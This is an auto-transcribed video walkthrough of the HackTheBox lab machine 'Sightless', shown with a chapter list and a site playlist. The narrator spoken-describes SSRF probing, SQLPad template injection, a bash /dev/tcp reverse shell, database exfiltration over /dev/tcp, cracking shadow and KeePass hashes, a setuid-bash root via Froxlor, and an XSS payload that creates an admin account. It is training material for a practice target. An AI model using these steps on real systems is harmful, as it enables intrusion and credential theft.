HackTheBox - Sightless
Key Takeaways
Exploits SQLPad using a template injection vulnerability to gain remote code execution and escalate privileges
Full Transcript
what's going on YouTube this is IC and today we'll be doing sightless from hack the box which is a nice easy box it starts off with finding an outdated version of SQL pad running which has several vulnerabilities we'll play with the server side request forgery but really this just gets us Recon information it doesn't really do anything valuable the key vulnerability is a template injection that leads to remote code execution and gives us shell on a Docker container which we find credentials that lets us SSH into the host from the HST there are two paths to Route the intended way involves exploiting a cross-site scripting vulnerability and fro but to simulate this xss there is a headless Chrome running with the debug Port exposed so we can skip the whole cross-site scripting by accessing the Chrome Remote browser and then viewing the password they used to log in once we log in to foxler there are two paths as well the first being exporting froxlor itself to get root the other is changing credentials of a user which lets us access their home directory over FTP and that contains a key pass database which we can decrypt and get access to the root SSH key so with that being said let's just jump in as always off with an nend map so- SC for default scripts SV enumerate versions - VV for double boost this gives us the TTL and things like that OA output all formats put the end map directory and call it sightless then the IP address of 10101 11.32 this can take some time to run so I've already ran it looking at the results we have three ports open the first one being FTP on Port 21 and we see it's the pro ftpd server it's leaking the host name of the box which is s list. htb and every command it tries to run it's getting invalid command try being more creative so I don't know exactly what's going on here but let's just move on we have SSH on Port 22 the banner tells us it's an auntu server and we also have HTTP on Port 80 it's engine X also running on Ubuntu and directing us over to S list. htb so let's go ahead and add this to our host file so we'll do pseudo V Etsy host and then we can add 10 10 1132 site htb save that and now let's take a look at the page so we'll go to http list. htb and we get hello we are s list. htb how can we help you so the first thing I always like doing is just looking at the source code to see if anything sticks out if it's running like a CMS like WordPress or things like that I don't see anything really that sticks out here we can also look at the walizer plugin it's not telling us any new information so let's just go test like index.html brings back this page we can try an extension like PHP doesn't exist so chances are this is a static page we can try like index as well and that also goes 404 so I'm guessing this is just a static web page if we see it accepting user input then that'll change our mind a little bit later but this is just the things I'm looking at now I'm going to all the links we have a mail to sales sight list. htb I'm looking at SQL pad we see SQL pad. sight list. htb so let's go ahead and add this to our host file before we forget so we can add SQL pad sightless htb save that uh we have frl looking at this link it just goes to FRX la.org database and server management goes to the contact me button and this just sends a email to sales cit. htb so we don't really have too much to go off on we could look at FTP or just take a look at SQL pad I'm going to connect over to SQL pad and see what this is about so look at the databases we don't have any databases here I was hoping maybe it was connected to a database and we could use like a um get file command and start like reading files off the server we can't do that we can try like select one this is a relatively safe database command maybe if it gives output then we can just start trying to execute commands on the box doesn't look like we can if we go to new connection look at the drivers um we do have SQL light so we could maybe potentially do this I'm not sure let's do tab SQL light test save does this create the box or the database it looks like it does so we can create files on this box so potentially maybe if this is a PHP app maybe we could create a PHP file um I'm going to go SQL pad GitHub and see what language this is I'm guessing it's open source web-based SQL editor let's see what is this SQL pad let's go over to server I'm guessing this is going to be nodejs um yeah it's no JS so let's see what else can we do uh we probably could um do like a server side request forger type of thing so we going to create something called srf let's just do my SQL and see if we can make it make a connection over to us so I'll do 101148 which is my IP and let's just connect on 90001 so I'm going to NC lvmp 90001 we can test this connection and it does make one to us so this is a server side request forgery we could also see um connections running on local host of the box so let's test this out real quick I'm just going to send this over to burp go into test go in the repeater Tab and then I'm going to do 1271 and let's see the port let's do 22 and we get connection refused and this is telling me potentially that this is running in a Docker container or something like that so I'm going to give it the IP address of 1010 1132 and we get packet out of order um so it actually made its way over there it's just not a MySQL connection we do port a 80 um looks like it's hung so I'm guessing maybe it can't get over to Port 80 for whatever reason I'm going to go open a new tab because whenever like that connection that's hung in burp comes back and then like rewrites what's in the request panel and becomes really annoying so if we do 80 connection refused 8080 8,000 another common Port is like 3,000 or 5,000 and at 3,000 hangs so this means it can't connect back to it which means this is probably the port the web server is running on if we didn't want to guess a bunch of ports you could also send this over to fuff so if I um copy this request to a file I'm going to label it ssrf request then we can do a buff request specify the file request Proto HTTP word list I'm going to give it a word list of let's just do 29,000 to 3010 oh we can do 2990 to 3010 just so this doesn't take um that long right normally you do like 1 through 65,535 to test all the ports but for this just the demo we want to keep it um relatively quick and I think that's all we need right because the port has fluff in it so if I send it it's going to hang and it takes 10 seconds because that's what the timeout is and it will just say one error and we won't get exactly um what the data was so we just want to get there it's probably going to be another like 3 to 4 seconds and I'll show how to change FFF so we can actually see this right we have errors one so um the best way to do this is to use the match time so if I do fuff H um we can do let's see match and we can say match t for how many milliseconds to the first bite and I know it says um like the help is out of date match how many milliseconds to the First Response bite and if there is no response bite at the end it's going to display it so if we do a um- Mt I'm going to say 500 milliseconds and we need what is it greater than 500 milliseconds I think so we're waiting here it's been greater than half a second we don't have it outputting yet but soon as that 10 seconds hits it's going to display something and tell us right and the way I found this was I just went GitHub FFF and see if I can find it real quick um we have to get over the GitHub page I don't know why that Google query is not coming back um we're not connecting to the internet somehow disable I bet burp is set on intercept that's what happened yeah so looking here we can see timeout while time match is active fuzz 3000 so it's timed out reaching Port 3,000 so that's how we know that is the active Port right we could change uh this FFF to be 1 through 65535 and we'll let this run while we look at this issues right so I did this and I search timeout and let's see is there recursion doesn't add job few parameters there we go if I looked at this issue when you using um buff Mt time it doesn't display anything and then over here we just have the response saying it will display any everything now at the end of the request right so um that's a nice little change we only at like 6,000 of 65,000 um there we go it has timed down and to to support 3,000 uh but this was a lot to do about nothing really um finding out where I do doesn't really help us it's just good Recon I like doing the one thing we missed was enumerating what version SQL pad is running I go to about we can see version 610 right and it links us over to the change log right away which makes it easy to identify how old this is so if I search this page for 6 uh 101 was it 610 0 I said yeah 610 0 so 6101 uh we have 2022 0313 so this is like like 2 years old right so let's look for any type of exploit and SQL pad so we can do exploit SQL pad we could also look for like cve things like that um template injection so we can look at this so I'm guessing it's going to be the cve 2022 right there is a looks like an ssti and it looks like we just say um connection add connection MySQL and input this into the database so let's go back over to our request go in repeater um guessing the driver we'll just intercept the request again and see exactly what it is so we go U manage connection add connection um I'll call this SST driver it said my SQL and then in the database I think right is that what it told us to do um in the database form field yep so let's go I'm sure this doesn't really matter we want to intercept this so turn BP Suite on proxy intercept on I think I accidentally killed it see SQL 10 10 11 uh 32 okay test don't know what that is here we go so let's see it's putting it in both fields and we actually won't be able to see anything in temp pone right um we just get connection refused oh CU it's attempting to connect to this um let's do something that actually connects back let's do 101 uh 148 let's do 90001 and then we'll do NC lvmp I'll do a k before P for keep alive 9,1 so this way we can send it and then we get a connection back awesome I don't know if it actually has to connect um I figured if we're specifying a database we should let the process connect before we um Let It Die CU it may if it can't connect it may not even attempt to connect to a database right so now we have an exec field we want to get a reverse shell so I'm going to go Echo DN we'll do b-i Dev TCP 10148 9,1 0 and one like that let's base 64 encod it and the reason why I'm not doing a b-z beforehand because in my cradle that we're about to type we're going to do bash Das um see here right we know we're executing bash is what I should say so we can do Echo Bas 64- D and then pipe this over to bash and let's see I don't want the K when I'm doing a reverse Shell let's just do 9,000 did okay so the connection timed out and because it timed out it rewrote what was in my request field I really really hate when BP does that but let's just retype this out uh b 64- d pipe it over to bash connection with fuse but we get a shell awesome so uh the connection doesn't have to come back so you could leave this the host and port to be whatever you want it'll always just execute what's in that database field and no surprise we're in a dock room container we already had known that because um we did that like um service side request fory a couple minutes ago and I say no surprise when I doc container just because of the host name of this box I bet if I do lsla on slash we can see there we go the docker entry point so I'm going to do a wit Python 3 we don't have it let's do which script we have script installed so we can do um let's do script DQ Dev null pipe it over to bash or not pipe but execute Bash then I'll do control Z stty raw minus Echo FG enter enter and now we have things like tab autocomplete um I'm going to do bash here so we have the script we can do export term is equal to X term so we can clear the screen so let's see what we have here uh we have SQL pad. SQL light so I want to go and grab this database file so uh let's do n cvnp 901 let's C SQL pad. uh SQL light to Dev TCP 10148 91 I forgot to direct this over to a file so we'll do SQL pad SQL light there we go so we can now do SQL light 3 SQL pad. dump and dump all the data in here right so let's see um there should be inserts right there we go we have two insert into users so we have uh and admin and looks like we have let's see a null for John's password I'm guessing because we have admin null password hash so this should be the password hash here we have a potential password here so let's see did I copy that correctly I need to fix that real quick I copy that whole line break so we have this let's go ahead and go over into the Kraken which is just another box where I have hashcat running uh you can run it on your own machine just don't do it in a VM I'd recommend doing it on the host so let's vhes we'll call this SEL list. SQL paste this in um hashcat then hashes that opt word list Ro you. text it's going to go in Auto detect mode it'll probably error out because we have to tell it we want mode 3200 there we go so while that runs let's see what else we have on this uh there we go so I am running as root and if we look at Etsy pass WD we do have other users on this container uh Michael and node I just say other users because that's 1 10001 as the ID we cut Etsy Shadow we also have two hashes here so after this which it looks like it did crack that password is just admin so we should probably have some type of notes so we'll do votes. text I'm going to call it actually creds do text and this will be um SQL pad admin admin okay then let's go and grab these hashes so I'm going to GP for dollar $6 probably have to escape these dollar signs there we go then we can do al-f on a can we do it on semicolon I'm making sure there's no semicolons in the hash looks like we can and then print two there we go so we just have the hashes um I always like doing usernames too and my terminal is doing that weird line wrapping thing so we have to fix the TTY so we do stty a rows 28 columns 110 so let's set that real quick stty rows 28 columns 110 okay so we have that let's do a print dollar one Poland dollar two so now we have username callon the password this is the way I like storing hashes when I crack multiple and then we can go over into hashcat v hashes um sitelist dot Docker Shadow I guess and we can paste this do do slash cat and Docker Shadow and we have to give it the user flag and that's going to tell it um we have usernames in this um maybe it's Das username no hash is loaded token length exception I may bet it's not 3200 let's see well that cracked really fast so what mode was that 1800 and we have two matches here right we have Blindside and Insane Clown posi um it doesn't tell us the usernames here we could just like go back and look at our results but since we have it in the file let's delete the word list and I can just do D- show and hash cat's going to tell me Root's password is Blindside Michael's password is insane clown posi so let's go back into our notes and we'll say um Docker [Music] root uh let's see Docker rot and this is Blindside and Docker Michael Insane Clown posi okay save that and we can try um sshing into the box so I'm going to do SSH I'm going to do Michael first real quick so we try Michael at 10 10 1132 Insane Clown posy and we get logged in so it looks like that lets us onto the box so we can save this and say sightless SSH like that there we go and let's see what do we have well the first thing I always try when when I'm root on a dock container and low priv on the host is a um privilege escalation we saw in the intuition machine and that is like sharing a block device so I'm going to do LSB and we see the block device I want is 253 so I'm going to run MK nod Dev I'm going to call it like root FS block device 2530 and we get operation not permitted so um the docker capability is not there for us to exploit this so I just forget about it um that is somewhat common I found so it's just one of those things I just try really quickly you can probably like enumerate your docka privileges to see if you have it um but I normally just run the command first because it doesn't take that long so let's see we're Michael on the box let's go to a PF command so I'm going to do p ef-- forest and then l-s so we can see all the running processes and looking at KRON we have something interesting so every little over two minutes we're running this health chck command and that does the Sleep 60 this is almost 2 minutes we're running some Administration it's running Chrome driver on Port 55521 and let's see there's probably going to be a debug Port there we go remote debugging Port is equal to zero so we could stand up Chrome and access this browser potentially and this is going to be a unintended route but I'm going to show this first and then we're going to show the intended way right so let's go ahead and look at this so we want to do a SS lntp to see all the listening ports and one of these is going to be the actual um Chrome Port I think the port that is shown let's see I think 55521 this is some type of like redirection Port so I don't think that's the port we actually want it's probably going to be um something in the 40,000 range so probably this let's just try this first so I'm going to do um squiggly c as the first command so squiggly do enter squiggly C there we go let's forward Port 41 845 to 1271 41 845 and I always like using IP addresses not Local Host because sometimes Local Host goes to IPv6 and all things get wonky so it's always safest just to use the 127 address so now that we have that I'm going to open up Chrome uh let's do chromium there we go and then I want to I think it's inspect so we'll do Chrome inspect there we go uh device Target and we'll do 127 001 and then what is the port 41 845 is what we just forwarded so we can put this click done and there we go we have proxor and it's pointed at admin stits htb it just went over to index.php so we can go inspect and we can actually view what that browser is doing and we have the network tab up if I go to um well right here we don't see anything it's going to log in and when it logs in we'll be able to see the payload that sent right there we go we have login name admin the password is for L Fox admin and I did not get to copy that so let's just wait for it to happen again it should happen probably in 5 seconds and I'll press contrl C so it actually gets copied this time so there we go it's typed it copy that paste awesome so let's go back over to our notes and we can say foxler and that's admin like that save that and now we have to access this page so um this is going to admin. sight list. htb port 8080 so let's forward that to let's try like Port 9,000 um I don't want to do 8080 because that's where burp is listening so I'm going to go SSH and do the squiggly C thing again- L um 8080 nope this is what we're listening we'll listen on Port 9,000 and go to 1271 8080 that Port is now forwarded so if I go over to Firefox we try Local Host and then 9,000 I think burp is set to intercept so we can turn that off we get demand is not configured remember they were going to admin. fox. htb I think IP address also works right um maybe not so let's try changing the um virtual host so we can do let's save that pseudo VY host admin I think it was admin stits htb I wish I actually paid more closer attention admin sight list hdb oh let's try 1271 again that does work so what happened let's do it again real quick I did Local Host 9000 it directed me to notice. HTML and when I change this I still hit notice. HTML but if I went back to the rout we get the froxlor so let's go to login the username was admin and then the password we had saved it's a weird forl FRS admin I think that's how you pronounce it paste this in and then we get get logged in now there's probably a few ways to get um rce from here we just click around like system configuration uh not that go to settings we look at like PHP settings Pearl settings maybe FTP even like you can change well this is enable disable PHP fpm like we can change binaries so chances are we could like change the path to Pearl to be a shell script and then execute that right um FTP server maybe we can edit the pro fpd settings to change a binary name there's a few ways and the actual intended way isn't to rce this web server at all we'll go over that at the end of the video um but we're going to show the unintended way really quick so I was noticing there's like PHP fpm versions and it allows us to restart PHP fpm we can create a new config and I'm going to call this pwned and this isn't the most stable and maybe I don't know exactly how to exploit this the best way so I'm going to do a silly thing and going do chod 4755 on bin bash now normally you'd want to like copy bash somewhere else so not changing the default shell but I haven't had the most luck with like having the stable being to run multiple commands so we just want to make sure we do it in one shot right and if we copied bash over to let's say temp then the owner is now Michael so we have to change the owner to root then we have to CH mod to give it the set u ID bit it's just um annoying right so we can see the permissions right now what you'd expect 755 we want to change it to 4755 so that's a set uid bit so let's change this to Dynamic on the process manager control save these changes and if we do stat again it has not changed I think if we um go to system configuration oh no settings and then the PHP fpm we disable this and now runs the commands that are in the restart when we go to started I think so let's start this back up we do a stat again and it's still just 755 so that did not do it um if we go back to PHP fpm versions we see configurations not in use so let's change this FRX Flor vhost config from system default to our config and then we can just save this so we probably just destroyed this website um maybe we want to do web one but let's just see what happens so now we have the frore Vost config and I just realized the admin is going to be ourselves so we may destroy our own box we'll see what happens um we can always revert if something goes wrong so PHP fpm look at it it's still 755 disable it and then we're going to enable it again and let's see it's still just 755 this is what I've been meaning it's not the most stable I've had times when it just works every time um let's edit this I wonder if we save it does it run there we go I don't know what just happened maybe you have to save it after it's running but now we see bash is now U marked um set u ID we can do b-p ID and we are root so let's see real quick maybe that was it maybe I just had to click save let's do test and I'm going to touch Dev shm pwn we want to make sure this is dynamic save and weird error um so I don't know exactly how to come back from this other than reverting the box I think it only affects the fpm Damon so we're probably good it's probably because um we changed that site right let's go settings uh configuration where was it PHP configs maybe it's this you can set that back to default and restart it see if that fixes it but if not then we'll just move on and do the intended way so let's go configuration nope settings PHP fpm down let's hope this restores that up PHP fpm versions create new test let's do touch yep Dynamic save and yeah we got some weird error message so I think we're kind of on getting code execution that way but we already did so if you wanted to um you can get it this way but let's go um take a few steps back and we're going to do the Box the intended way right so let's log out of this um foxlore log out because we don't need any of that to do the Box well um you actually log in through FTP but in order to get the actual credential for this we weren't supposed to use the Chrome debug thing we're actually supposed to use a cve so if we looked at like FR lore exploits there is a um crite scripting vulnerability somewhere let's see blind xss and the advisories and they have a payload here so let's grab this um we'll save it and then copy it to a directory and then look at exactly how this works so copy downloads payload here look at it it's all URL encoded let's C it out and we will use burp to I guess decode it and see exactly what this looks like so V decoded. txt paste it and now we want to search for all semicolons replace them with a return character and let's see we probably want to clean up the pluses and make them spaces so do percent s again plus space g there we go so this is going to be what the payload does um the first line and the last line is just JavaScript so we um enter the cross- aid scripting and then execute this code and all this is a simple cross state request payload that will uh send a post request right here over to demorro la.org admin or yeah ad admin admin.php with this payload so we're just creating a new admin essentially and we're hijacking the um session of the user right so we're going to have to modify this because herbox is not at demorro fl.org now we could be really lazy um we don't need to put the domain there we could just make the payload this and then the browser is going to use whatever page it's on and that's probably going to be what we do but if you wanted to know the actual page there were a few hints that would lead you down the path to get it right um the first one is if we went back to the PF Force command and look at all the processes there's both engine X and Apache running which is pretty odd right you kind of want to look into the Apache config if you see that um if we go all the way back to the end map the end map just told us engine X because we didn't have port 8080 listening so we couldn't see 880 was actually Apache so that's alone is enough for you to go dig into Apache but also if we go back to burp and let's intercept a request to proxl so we send this go over to the repeater pane we can see if we looked at this where is the server I swear it says it somewhere oh there we go right at the top Apache 2452 Ubuntu right so there are hints that we should look at Apache and if we look at Apache we can go cat Etsy Apache sites enabled and then we have a few um we could look at the froxlor ipn port and this is server name admin sight list. htb so this is where the user is at so we' probably just replace the um URL with admin sight list. htb and it's probably going to be on port 8080 uh let's see Etsy Apache g- R 8080 is Apache listening yeah um we're listenting on 127 01880 but that is how you get the domain admin sight list. htb if you wanted to put that in the payload but I would recommend um just not putting a domain and having it be like this because when you put the domain um I think it's actually putting like get and and then um the full domain here I wonder if that works let's do 1271 9,000 index.php no bad request um we specify htttp yeah oddly enough this is a valid HTTP request I don't know if it's valid by RFC standard but when you put the full um URL in I think that's what you're doing I don't know if it's handling it programmatic ially or it's just um doing it like that so I'd recommend just removing that so let's go back to payload text and where we have htps I'm going to delete this I'm going to delete demo explore.org and there we go this should be your payload so if I cat payload.exe we can now copy this and then if we go back to the blind xss it's telling us to provide an invalid username to the login so let's go um let's intercept another request we can forward this l in we will put this on repeater and then we want to put our payload on the login name because there's a page in frl that will show you all the users that failed to log in and for some reason this template will just execute JavaScript on the user browser I don't fully understand what's going on here but that's what this piece is doing so this is like the um template injection on the login Fe um like table of failed logins and then this is the JavaScript that we're running so if we send this request it'll probably take a minute or two for the admin to hit the page but when they do it's going to add that account of what was it ABCD so add ABCD and then I think that's like ABCD maybe1 two 3 4 let's just go back to the page to get it so we'll try logging in with ABCD like that and the password ABCD yes it is at at hopefully it works paste this um let's turn burp Suite off probably going to erase that because we had a failed login pending log in and it did not log Us in looking at the password abcd1234 that is not working I wonder if we need to do admin if this doesn't work in a minute I'll just put the full URL I want if there's something wonky with like the automation that it needs the full URL because I think it should just work with this um payload let's copy payload to payload 2. text real quick B payload 2 and I'm going to put the whole thing so this was what HTTP admin sist HTP port 8080 cat payload 2. text and just before before we do this let's try it one more time AB c d like that okay that's definitely not logging in let's grab payload 2 copy and we will paste this admin sightless htb I think that's fine the ab CD I wonder if it's a cap nope new login name lower case admin password there's a capital a um I closed the tab but I swear Rox lore there like a undo reopen close tab awesome admin password yeah it's a capital A was that the issue oh shoot um ABC D capital A we get logged in so I want to see if my other payload worked I can show exactly what's going on real quick so if we go to system system log we can see um these are the users and our frox application has been hacked because we have this unknown user right here some reason that triggered it right um so let's go log out real quick I'm going to log in with admin so we can delete this user because I don't think you can delete yourself but we should be able to delete this user so let's do cat and we'll just create a new user actually let's do payload text we already have that in our burp Suite window uh no we don't copy this we will paste this and then where is here it is new login name is equal to we'll do IPC and then that will be the password so we'll send this and then if I log in again cat creds I'm guessing by the time I do this the cross aate scripting already hits and it created ipack we go to resources admins yeah I do exist so that was the issue um the p the password Here is actually a capital A let me download this and make sure that I did not screw that up we'll replace that sure open payload and admin password is equal to percent 3D yep Capital ABCD wow so um if you're copying it from this page the payload is slightly different so um yeah now I guess let's do the next step so if we went in for um at this point we're just supposed to be like one of the users we created it doesn't matter I guess I could log in with IPC um hipc and then the password abcd1234 there we go so the intended way is not to get rce on this but instead we look at traffic and we do of 2024 we can see there's FTP traffic and to the user web one so we want to look at what files are in web one which is John so let's go and um change John's password so we can FTP in uh let's go not customer index oh when I click that it like made me impersonate web one which was weird but okay so we can go here users we can edit and then password I'm going to change the password to Please Subscribe um actually let's put that on a clipboard and type it like that okay paste and save so now we have password for web one so we should be able to FTP to the box so if we do FTP um 10 10 11 32 we get connected and then if we wait like probably 20 30 seconds it will then prompt us for the username I'm guessing what happened here is it's doing like a reverse DNS lookup and it just times out or something like that so if we specify the username of web one it tells us SSL TLS is required so I'm going to switch to a different binary lftp because this one is going to support um the protocol right so if I do Di I probably to specify username right um let's do lftp web 1 at like this specify the password please subscribe and then we can do dir and it's going to probably fail SSL and lftp let's see lftp disable SSL it's probably got to add verification as well it's like set SSL verification no I think let's see uhsl verify certificate false so set SSL verify certificate false there we go so now I do Dr and going to do the feat negotiation whatever that means and it should come backs login failed so it did not work with a login let's go back to the website and see if the user works so I'm going to go new private window and we'll do 1271 9000 log in web one password of Please Subscribe log again the password does work uh do a DI again and let's see if it passes this time I think there's some weird thing where the password gets set when you actually log into the froxlor admin panel so even though we changed the password web one nope that did not work there uh let's go lftp that's why I prefer the password okay hopefully this time it works 10 10 1132 that should be the right um IP Els logging in login incorrect okay uh we must be be doing something wrong so let's go back here and let's see if we go to the options we set the password Here I wonder if there's a separate password for FTP like this is the web password but I wonder if there's a way to set just FTP we click web one we will impersonate them uh go to the FTP accounts this must be it let's set a password clipboard still says Please Subscribe click save there we go now Moment of Truth does this finally work it's attempting the negotiation I wish it didn't take so long to do this but hopefully after TLS we send there we go that's it so make sure when you set the password to set it on the FTP right so if we go look at go access we do a DI there is a backup directory we can look at this and there's a key pass database so we can do a get database. kdb save that and then let's see it should be right here and if we do KP CLI uh-h is it like what is the argument kdb and then specify the database we need the master password I just tried password and it does not work so there's probably a key pass to John database there we go let's copy this and we'll go back over to hashcat and try to crack it and that is a long hash holy cow okay where is there we go nope um think I'm out of hashcat so let's just SSH kacken CD hashcat V hashes key pass and then we will paste that hash and thenat this opt word list rocku and see if it autod detects this um specify the hash mode it's either one of these key pass one and key pass two um I'm going to do 13400 because I don't know what key file only mode is it looks like this is enough to get it started and are we starting yet looks like we are look at the time how long is this going to take says 43 minutes hopefully it doesn't take that long um should only take there we go I was about to say normally it's near the top of rock you if a kraken challenge is there and the password is bulldogs so let's go ahead and open that so KP CLI always we get it's kdb database all dogs and we get logged in so I'm going to do a find Dot and that's going to find um all the things and we can see there is SSH root and then pass so I'm going to do a show SSH and we can add a-f to show the password and we have Roots password here so let's do a su and see if we can authenticate does not look like we can so there is a attachment which is ID RSA I'm going to do attach this and let's export it and we'll export to home IPC ID RSA that's fine and we finish so I'm going to copy ID RSA over here let's see the permissions uh chod 600 then we can do sh- I idsa root at 10 10 11 32 and we get invalid format so let's look at the file it looks like it's an SSH key I think they're supposed to end with a line break still invalid format let's see the encoding and whenever you see the the dot dotts and a SSH key it's probably because it's terminated with 0 d0 a and it only wants 0 a and the quickest way to fix this is Dos to Unix so now let's xxd it we can see it's just 0 a so let's use this key again and there we go we get logged in so that is going to be the Box hope you guys enjoyed it take care and I will see you all next time
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:30 - Discovering SQLPad
06:20 - Discovering a SSRF in SQLPad when adding connections. Sending to FFUF, use a time filter to show timeouts
10:01 - Finding the SQLPad Version (6.10.0), which has a template injection vulnerability getting a shell
14:25 - Shell returned, extracting the SQLPad database
17:45 - Cracking the shadow file of the docker container to get michaels password
21:05 - Shell as Michael, discovering headless chrome is running forwarding ports to access it
26:55 - Logging into froxlor, getting RCE as root by changing PHP-FPM Configuration
32:40 - Doing the box the intended way, getting Froxlor Cookie via XSS
44:30 - Changing the Web1 users password so we can FTP Into the box
49:00 - Cracking the Keepass database to get root ssh key
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
Related AI Lessons
⚡
⚡
⚡
⚡
Built a suite of client-side dev tools to fix the "production data" privacy gap
Dev.to · Rayan Ahmad
5 Best BrowserStack Alternatives to Optimize Your Testing Infrastructure
Medium · DevOps
️ The Lifecycle Symphony: A Senior SRE’s Deep Dive into Init and Sidecar Containers
Medium · DevOps
`wrangler dev --remote` silently writes to your production KV namespace — here's the fix
Dev.to · 강해수
Chapters (12)
Introduction
1:00
Start of nmap
3:30
Discovering SQLPad
6:20
Discovering a SSRF in SQLPad when adding connections. Sending to FFUF, use a t
10:01
Finding the SQLPad Version (6.10.0), which has a template injection vulnerabil
14:25
Shell returned, extracting the SQLPad database
17:45
Cracking the shadow file of the docker container to get michaels password
21:05
Shell as Michael, discovering headless chrome is running forwarding ports to a
26:55
Logging into froxlor, getting RCE as root by changing PHP-FPM Configuration
32:40
Doing the box the intended way, getting Froxlor Cookie via XSS
44:30
Changing the Web1 users password so we can FTP Into the box
49:00
Cracking the Keepass database to get root ssh key
🎓
Tutor Explanation
DeepCamp AI